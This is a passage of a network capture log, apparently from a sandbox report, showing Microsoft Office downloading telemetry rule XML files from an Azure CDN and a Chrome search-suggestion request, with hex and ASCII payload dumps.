2024-12-07 11:59:16 UTC	16384	IN	Data Raw: 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 54 65 6e 61 6e 74 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 55 73 65 72 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 66 61 6c 73 65 22 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 Data Ascii: L> <S T="3" F="Tenant enabled" /> </L> <R> <O T="EQ"> <L> <S T="3" F="User enabled" /> </L> <R> <V V="false" T="B" /> </R>
2024-12-07 11:59:16 UTC	16384	IN	Data Raw: 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 34 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 Data Ascii: us" /> </L> <R> <V V="404" T="U32" /> </R> </O> </F> <F T="7"> <O T="AND"> <L> <O T="GE"> <L> <S T="2" F="HttpStatus" /> </L>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1	192.168.2.7	49703	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 11:59:18 UTC	193	OUT	GET /rules/rule120402v21s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 11:59:19 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 11:59:19 GMT Content-Type: text/xml Content-Length: 3788 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT ETag: "0x8DC582BAC2126A6" x-ms-request-id: 3fcd35f4-e01e-0052-4b02-48d9df000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T115919Z-r1cf579d778x776bhC1EWRdk800000000290000000002r8g x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 11:59:19 UTC	3788	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 34 30 32 22 20 56 3d 22 32 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 6e 67 72 61 63 65 66 75 6c 41 70 70 45 78 69 74 44 65 73 6b 74 6f 70 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 22 20 78 6d 6c 6e 73 3d 22 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""

Session ID	Source IP	Source Port	Destination IP	Destination Port
2	192.168.2.7	49705	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 11:59:18 UTC	192	OUT	GET /rules/rule224902v2s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 11:59:19 UTC	491	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 11:59:19 GMT Content-Type: text/xml Content-Length: 450 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT ETag: "0x8DC582BD4C869AE" x-ms-request-id: c11b12be-901e-0048-4704-48b800000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T115919Z-r1cf579d778bb9vvhC1EWRs95400000001tg000000003kav x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-12-07 11:59:19 UTC	450	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 62 72 35 71 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 61 33 36 61 39 37 30 64 2d 34 35 61 39 2d 34 65 30 64 2d 39 63 61 62 2d 32 61 32 33 35 63 63 39 64 37 63 36 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 47 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 4e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN

Session ID	Source IP	Source Port	Destination IP	Destination Port
3	192.168.2.7	49706	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 11:59:18 UTC	192	OUT	GET /rules/rule120608v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 11:59:19 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 11:59:19 GMT Content-Type: text/xml Content-Length: 2160 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT ETag: "0x8DC582BA3B95D81" x-ms-request-id: a36b2733-e01e-0051-6f03-4884b2000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T115919Z-r1cf579d7789trgthC1EWRkkfc000000032g0000000000ka x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 11:59:19 UTC	2160	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 37 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 33 22 20 52 3d 22 31 32 30 36 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 36 31 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 35 22 20 52 3d 22 31 32 30 36 31 34 22 20 2f 3e 0d 0a 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
4	192.168.2.7	49704	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 11:59:18 UTC	192	OUT	GET /rules/rule120600v4s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 11:59:19 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 11:59:19 GMT Content-Type: text/xml Content-Length: 2980 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT ETag: "0x8DC582BA80D96A1" x-ms-request-id: 2b116ba0-201e-0051-0503-487340000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T115919Z-r1cf579d7789trgthC1EWRkkfc00000002yg000000002vfa x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 11:59:19 UTC	2980	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 30 22 20 56 3d 22 34 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 44 65 76 69 63 65 43 6f 6e 73 6f 6c 69 64 61 74 65 64 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"

Session ID	Source IP	Source Port	Destination IP	Destination Port
5	192.168.2.7	49707	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 11:59:18 UTC	192	OUT	GET /rules/rule120100v3s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 11:59:19 UTC	492	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 11:59:19 GMT Content-Type: text/xml Content-Length: 1000 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT ETag: "0x8DC582BB097AFC9" x-ms-request-id: cb80336d-801e-0078-59bd-47bac6000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T115919Z-r1cf579d778qgtz2hC1EWRmgks0000000220000000003dem x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 11:59:19 UTC	1000	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 31 30 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 74 61 72 74 75 70 22 20 2f 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 32 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 52 65 73 75 6d 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 49 20 54 3d 22 33 22 20 49 3d 22 33 30 73 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 35 22 3e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120100" V="3" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryStartup" /> <A T="2" E="TelemetryResume" /> <TI T="3" I="30s" /> <R T="4" R="120100" /> <TH T="5">

Session ID	Source IP	Source Port	Destination IP	Destination Port
6	192.168.2.7	49708	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 11:59:21 UTC	192	OUT	GET /rules/rule120609v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 11:59:21 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 11:59:21 GMT Content-Type: text/xml Content-Length: 408 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT ETag: "0x8DC582BB56D3AFB" x-ms-request-id: b9950e54-401e-0015-4806-480e8d000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T115921Z-r1cf579d778kr8xrhC1EWRfkun00000002t0000000001e4w x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 11:59:21 UTC	408	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 44 64 5d 5b 45 65 5d 5b 4c 6c 5d 5b 4c 6c 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port
7	192.168.2.7	49709	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 11:59:21 UTC	192	OUT	GET /rules/rule120610v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 11:59:21 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 11:59:21 GMT Content-Type: text/xml Content-Length: 474 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT ETag: "0x8DC582B9964B277" x-ms-request-id: 27a1a40f-f01e-0096-7d0b-4810ef000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T115921Z-r1cf579d778d5zkmhC1EWRk6h800000002r00000000035f8 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 11:59:21 UTC	474	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
8	192.168.2.7	49710	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 11:59:21 UTC	192	OUT	GET /rules/rule120611v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 11:59:21 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 11:59:21 GMT Content-Type: text/xml Content-Length: 415 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT ETag: "0x8DC582B9F6F3512" x-ms-request-id: 9879796e-101e-0034-5802-4896ff000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T115921Z-r1cf579d7786c2tshC1EWRr1gc00000001ug000000003te3 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 11:59:21 UTC	415	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4c 6c 5d 5b 45 65 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 56 76 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru

Session ID	Source IP	Source Port	Destination IP	Destination Port
9	192.168.2.7	49711	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 11:59:21 UTC	192	OUT	GET /rules/rule120613v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 11:59:21 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 11:59:21 GMT Content-Type: text/xml Content-Length: 632 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT ETag: "0x8DC582BB6E3779E" x-ms-request-id: 1e9ba10d-901e-0029-2907-48274a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T115921Z-r1cf579d778z4wflhC1EWRa3h000000002b0000000002b1a x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 11:59:21 UTC	632	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 48 68 5d 5b 50 70 5d 28 5b 5e 45 5d 7c 24 29 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 33 22 20 52 3d 22 28 5b 48 68 5d 5b 45 65 5d 5b 57 77 5d 5b 4c 6c 5d 5b 45 65 5d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" R="^([Hh][Pp]([^E]\|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]

Session ID	Source IP	Source Port	Destination IP	Destination Port
10	192.168.2.7	49712	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 11:59:21 UTC	192	OUT	GET /rules/rule120612v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 11:59:21 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 11:59:21 GMT Content-Type: text/xml Content-Length: 471 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT ETag: "0x8DC582BB10C598B" x-ms-request-id: 3de6f1c3-b01e-003d-6e01-48d32c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T115921Z-r1cf579d778v97q7hC1EWRf95c0000000200000000000n5x x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 11:59:21 UTC	471	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.7	49715	142.250.181.68	443	7580	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-07 11:59:21 UTC	595	OUT	GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlqHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc= Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-07 11:59:22 UTC	1266	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 11:59:22 GMT Pragma: no-cache Expires: -1 Cache-Control: no-cache, must-revalidate Content-Type: text/javascript; charset=UTF-8 Strict-Transport-Security: max-age=31536000 Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-4M4BzWpAEGfcGIeAbw5A1w' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]} Accept-CH: Sec-CH-Prefers-Color-Scheme Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: 